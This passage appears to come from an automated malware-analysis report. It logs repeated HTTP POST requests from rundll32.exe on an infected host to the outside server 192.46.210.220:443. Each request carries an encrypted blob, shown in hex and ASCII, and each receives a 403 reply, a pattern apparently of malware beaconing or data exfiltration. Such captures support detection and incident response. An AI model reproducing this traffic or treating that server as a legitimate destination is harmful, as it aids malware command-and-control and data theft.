                                                                                                        2021-10-28 02:58:35 UTC84OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:36 UTC89INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:36 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.649827192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:36 UTC89OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:36 UTC89OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:37 UTC94INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:37 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.649833192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:39 UTC94OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:39 UTC94OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:40 UTC99INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:40 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.649758192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:04 UTC9OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:04 UTC10OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:05 UTC14INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:05 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.649836192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:40 UTC99OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:40 UTC99OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:41 UTC104INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:41 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.649840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:43 UTC104OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:43 UTC104OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:44 UTC109INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:44 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.649844192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:46 UTC109OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:46 UTC109OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:46 UTC114INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:46 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.649848192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:47 UTC114OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:47 UTC114OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:48 UTC119INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.649852192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:49 UTC119OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:49 UTC119OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:50 UTC124INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:50 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.649856192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:51 UTC124OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:51 UTC124OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:52 UTC129INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:52 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.649862192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:53 UTC129OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:53 UTC129OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:54 UTC134INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:54 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.649866192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:55 UTC134OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:55 UTC134OUTData Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:56 UTC139INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:55 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.649871192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:57 UTC139OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:57 UTC139OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:58:58 UTC144INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:58:58 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.649874192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:59 UTC144OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4850
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
